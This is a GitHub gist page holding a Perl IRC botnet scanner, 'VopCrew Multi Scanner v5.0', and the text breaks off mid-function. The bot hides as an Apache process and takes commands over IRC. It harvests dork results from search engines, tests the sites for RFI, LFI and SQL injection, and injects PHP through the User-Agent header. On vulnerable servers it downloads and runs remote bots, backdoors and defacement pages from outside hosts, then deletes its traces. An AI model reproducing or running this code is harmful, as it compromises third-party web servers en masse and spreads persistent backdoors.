Skip to content

Instantly share code, notes, and snippets.

@ariestiyansyah

ariestiyansyah/VopCrew Multi Scanner v5.0 Final Release

Last active June 26, 2016 09:00
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ariestiyansyah/9368281 to your computer and use it in GitHub Desktop.
Save ariestiyansyah/9368281 to your computer and use it in GitHub Desktop.
Download ZIP
Script IRC
Raw
VopCrew Multi Scanner v5.0 Final Release
#!/usr/bin/perl
############################################
# VopCrew Multi Scanner v5.0 Final Release #
# Moded by bjork #
# Copyleft © 2010 #bjork@byroe.net #
############################################
# Dipersilahkan yang Ingin Menambah Engine #
############################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;
my $fakeproc = "/usr/local/apache/bin/httpd -DSSL";
$ircserver = "pulau.byroe.net";
my $ircport = "6667";
my $nickname = "[parah]";
my $ident = "knownothing";
my $channel = "#parah";
my $runner = "bjork";
my $fullname = '15(7@2Multi-Scanner15)';
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $sqlcmd = '!sql';
my $phpshell = 'http://www.green-light.de/components/com_sef/img.jpg?';
$rfi_result = "evilc0de";
$lfi_test =
"../../../../../../../../../../../../../../../../../proc/self/environ%00";
$injector = "http://www.green-light.de/components/com_sef/id?";
$sql_test = "'";
$sql_output = ("You have an error in your SQL syntax|check the manual
that corresponds to your MySQL server version for the right syntax to
use near");
$asp_output = ("Unclosed quotation mark after the character
string|Unclosed quotation mark before the character string");
my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully
...\n [-] Process/PID : $fakeproc - $$\n";
print $success;
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
chdir("/");
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} =
$IRC_socket->sockhost;
nick("$mynick");
sendraw("USER $ident ".$IRC_socket->sockhost."
$ircserver_con :$fullname");
sleep 1;
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?)
\:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled
Mardam-Bey\001");
}
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :H3LLCR3W UnderGround");
sendraw("PRIVMSG $runner :Hi $runner im here !!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname",
"$ircserver", "$ircport"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
#####################################################################
############################[ CMD LIST
]#############################
#####################################################################
if ($msg=~ /PRIVMSG $channel :!help/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 $rficmd <bug> <dork> ");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 $lficmd <bug> <dork> ");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 $sqlcmd <bug> <dork> ");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 !version | !about ");
}
if ($msg=~ /PRIVMSG $channel :!id/){
&response();
}
if($msg =~ /PRIVMSG $channel :!quit/){
exit(0);
}
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Version15)12 H3LLCR3W SQL Scanner Moded");
}
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Engine15)12 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo,
Onet, Witch");
}
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2PID15)12 Process/ID : 4 $fakeproc - $$");
}
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2About15)3 H3LLCR3W SQL Scanner Moded");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2About15)3 Moded by bjork/");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2About15)3 Copyleft © 2009 H3LLCR3W");
}
#####################################################################
###############################[ RFI
]###############################
#####################################################################
#####################################################################
Google Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2RFI15)(7@2H3LLCR3W15)12 Dork :4 $d0rk");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2RFI15)(7@2H3LLCR3W15)12 File :4 $bugx");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2RFI15)(7@2H3LLCR3W15)7 Search Engine Loading ...");
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Google2 Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe2";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Altavista Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
ASK Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
UoL Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Onet Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Onet";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Witch Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Witch";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
###############################[ LFI
]###############################
#####################################################################
#####################################################################
Google Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2LFI15)(7@2H3LLCR3W15)12 Dork :4 $d0rk");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2LFI15)(7@2H3LLCR3W15)12 File :4 $bugx");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2LFI15)(7@2H3LLCR3W15)7 Search Engine Loading ...");
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Google2 Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe2";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Altavista Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
ASK Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
UoL Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Onet Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Onet";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Witch Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Witch";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Virgilio Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Virgillio";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Sapo Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Sapo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Naver Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Naver";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
###############################[ SQL
]###############################
#####################################################################
#####################################################################
Google Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2SQL15)(7@2H3LLCR3W15)12 Dork :4 $d0rk");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2SQL15)(7@2H3LLCR3W15)12 File :4 $bugx");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2SQL15)(7@2H3LLCR3W15)7 Search Engine Loading ...");
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Google2 Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe2";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Altavista Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
ASK Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
UoL Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Onet Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Onet";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Witch Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Witch";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH
:\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
#####################################################################
Procedure
sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @google=&google($dork);
push(@total, @google);
}
if ($engz =~ /AllTheWeb/) {
my @alltheweb=&alltheweb($dork);
push(@total, @alltheweb);
}
if ($engz =~ /Bing/) {
my @Bing=&Bing($dork);
push(@total, @Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @altavista=&altavista($dork);
push(@total, @altavista);
}
if ($engz =~ /AsK/) {
my @ask=&ask($dork);
push(@total, @ask);
}
if ($engz =~ /UoL/) {
my @uol=&uol($dork);
push(@total, @uol);
}
if ($engz =~ /Onet/) {
my @onet=&onet($dork);
push(@total, @onet);
}
if ($engz =~ /Witch/) {
my @witch=&witch($dork);
push(@total, @witch);
}
if ($engz =~ /Google2/) {
my @google2=&google2($dork);
push(@total, @google2);
}
if ($engz =~ /YahOo/) {
my @yahoo=&yahoo($dork);
push(@total, @yahoo);
}
my @clean = &calculate(@total);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4
(".scalar(@clean).")");
if (scalar(@clean) != 0) {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)7 Exploiting4 $dork");
}
my $uni = scalar(@clean);
foreach my $target (@clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)10 Scan Finish for14 $dork");
}
my $xpl = "http://".$target.$bugz.$injector."?";
my $vuln = "http://".$target."12".$bugz."7".$phpshell."?";
my $re = getcontent($xpl);
if($re =~ /$rfi_result/ && $re =~ /uid=/){
os($xpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)15(13@12Vulnera
e15)4 ".$vuln."
15(7@6".$os."15)(7@3SAFEMODE-OFF15)");
}
elsif($re =~ /$rfi_result/)
{
os($xpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$vuln."
15(7@6".$os."15)(7@4SAFEMODE-ON15)");
}
}
}
sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @google=&google($dork);
push(@total, @google);
}
if ($engz =~ /AllTheWeb/) {
my @alltheweb=&alltheweb($dork);
push(@total, @alltheweb);
}
if ($engz =~ /Bing/) {
my @Bing=&Bing($dork);
push(@total, @Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @altavista=&altavista($dork);
push(@total, @altavista);
}
if ($engz =~ /AsK/) {
my @ask=&ask($dork);
push(@total, @ask);
}
if ($engz =~ /UoL/) {
my @uol=&uol($dork);
push(@total, @uol);
}
if ($engz =~ /Onet/) {
my @onet=&onet($dork);
push(@total, @onet);
}
if ($engz =~ /Witch/) {
my @witch=&witch($dork);
push(@total, @witch);
}
if ($engz =~ /Google2/) {
my @google2=&google2($dork);
push(@total, @google2);
}
if ($engz =~ /YahOo/) {
my @yahoo=&yahoo($dork);
push(@total, @yahoo);
}
if ($engz =~ /Virgillio/) {
my @virgillio=&virgillio($dork);
push(@total, @virgillio);
}
if ($engz =~ /Sapo/) {
my @sapo=&sapo($dork);
push(@total, @sapo);
}
if ($engz =~ /Naver/) {
my @naver=&naver($dork);
push(@total, @naver);
}
my @clean = &calculate(@total);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4
(".scalar(@clean).")");
if (scalar(@clean) != 0) {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)7 Exploiting4 $dork");
}
my $uni=scalar(@clean);
foreach my $target (@clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)10 Scan Finish for14 $dork");
}
my $xpl = "http://".$target.$bugz.$lfi_test;
my $re = getcontent($xpl);
if ($re =~ /DOCUMENT_ROOT=\// && $re =~
/HTTP_USER_AGENT/){
if (my $pid = fork) { waitpid($pid, 0); } else
{ if (fork) { exit; } else {
my $ijo = exploit($xpl,"uname -svnrp;echo bjork;id");
$ijo =~ s/\n//g;
if ($ijo =~ /bjork#(.*)bjorkuid=(.*)#bjork/sg) {
my ($sys,$uid) = ($1,$2);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)4 http://".$target."12".$bugz."6[LFI]
15(7@3".$sys." 7uid=".$uid."15)(7@2VopCrew15)");
}
sleep(5);
my $pbot = exploit($xpl,"echo bjork
;lwp-download -a http://www.chompas.de/components/com_sef/beduls.txt
else.php");
$pbot =~ s/\n//g;
if ($pbot =~ /bjork#(.*)#bjork/sg) {
my $phpbot = "http://".$target."else.php";
getcontent($phpbot);
sendraw($IRC_cur_socket, "PRIVMSG $channel :12Trying to
spread PHPbot..");
}
sleep(5);
my $spreader = exploit($xpl,"echo bjork ;cd
/tmp;lwp-download -a http://www.chompas.de/components/com_sef/Fx199.txt
tmp2217;perl tmp2217;rm -rf tmp2217");
$spreader =~ s/\n//g;
if ($spreader =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :12Trying to
spread Perlbot..");
}
sleep(5);
my $bekdur = exploit($xpl,"echo bjork
;lwp-download -a http://dozo.rgr.jp/ping/.../com_sef/news.jpg news.php");
$bekdur =~ s/\n//g;
if ($bekdur =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG bjork :12Backdoor On
12".$target."news.php");
}
sleep(5);
my $cp = exploit($xpl,"echo bjork ;lwp-download
-a http://dozo.rgr.jp/ping/.../com_sef/help.jpg images.php");
$cp =~ s/\n//g;
if ($cp =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG bjork :12CP-Hacked
on 12".$target."images.php");
}
my $clean = exploit($xpl,"echo bjork ;rm -rf
else.php;rm -rf ping.php");
$clean =~ s/\n//g;
if ($clean =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :12[+]
12Clear ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$xpl." 15(7@3VopCrew15)");
}
} exit } sleep(3);
}
}
}
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @google=&google($dork);
push(@total, @google);
}
if ($engz =~ /AllTheWeb/) {
my @alltheweb=&alltheweb($dork);
push(@total, @alltheweb);
}
if ($engz =~ /Bing/) {
my @Bing=&Bing($dork);
push(@total, @Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @altavista=&altavista($dork);
push(@total, @altavista);
}
if ($engz =~ /AsK/) {
my @ask=&ask($dork);
push(@total, @ask);
}
if ($engz =~ /UoL/) {
my @uol=&uol($dork);
push(@total, @uol);
}
if ($engz =~ /Onet/) {
my @onet=&onet($dork);
push(@total, @onet);
}
if ($engz =~ /Witch/) {
my @witch=&witch($dork);
push(@total, @witch);
}
if ($engz =~ /Google2/) {
my @google2=&google2($dork);
push(@total, @google2);
}
if ($engz =~ /YahOo/) {
my @yahoo=&yahoo($dork);
push(@total, @yahoo);
}
my @clean = &calculate(@total);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2SQL15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4
(".scalar(@clean).")");
if (scalar(@clean) != 0) {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2SQL15)(7@2$engz15)7 Exploiting4 $dork");
}
my $uni = scalar(@clean);
foreach my $target (@clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2SQL15)(7@2$engz15)10 Scan Finish for14 $dork");
}
my $xpl = "http://".$target.$bugz.$sql_test;
my $vuln = "http://".$target."";
my $re = getcontent($xpl);
if ($re =~ /$sql_output/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2MYSQL15)(7@2$engz15)15(13@12ErrorQuery15)4 ".$vuln."
15(7@3H3LLCR3W15)");
}
elsif ($re =~ /$asp_output/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2MSSQL15)(7@2$engz15)15(13@12ErrorQuery15)4 ".$vuln."
15(7@3H3LLCR3W15)");
}
}
}
sub os() {
my $site = $_[0];
my $re = &query($site);
while ($re =~ m/<br>os:(.+?)\<br>/g) {
$os = $1;
if ($1 =~ //) { $os = "Unkn0wN"; }
}
}
sub response() {
my $re = getcontent($injector);
if ($re =~ /pZLNd8MwEITvg/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)12 «
3OK12 »");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)12 «
4JAH12 »");
}
}
sub getcontent() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
return $response->content;
}
sub exploit() {
my $url = $_[0];
my $rce = $_[1];
my $agent = "<?php echo \"bjork#\"; passthru(\'".$rce."\'); echo
\"#bjork\"; ?>";
my $ua = LWP::UserAgent->new(agent => $agent);
$ua->timeout(15);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
}
sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){
my
$Go=("http://www.google.co.kr/search?q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=100) {
my $all =
("http://www.alltheweb.com/search?cat=web&amp;_sb_lang=any&amp;hits=100&amp;q=".key($key)."&o=".$b);
my $Res = query($all);
while ( $Res =~ m/<span
class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}
sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $UoL =
("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b);
my $Res = query($UoL);
while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub onet() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=1) {
my $Onet =
("http://szukaj.onet.pl/query.html?qt=".key($key)."&p=".$b);
my $Res = query($Onet);
while ( $Res =~ m/<span class=\"?clurl\"?>http:\/\/(.+?)\//g ) {
my $k = $1;
if ( $k !~ Onet ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub witch() {
my @lst;
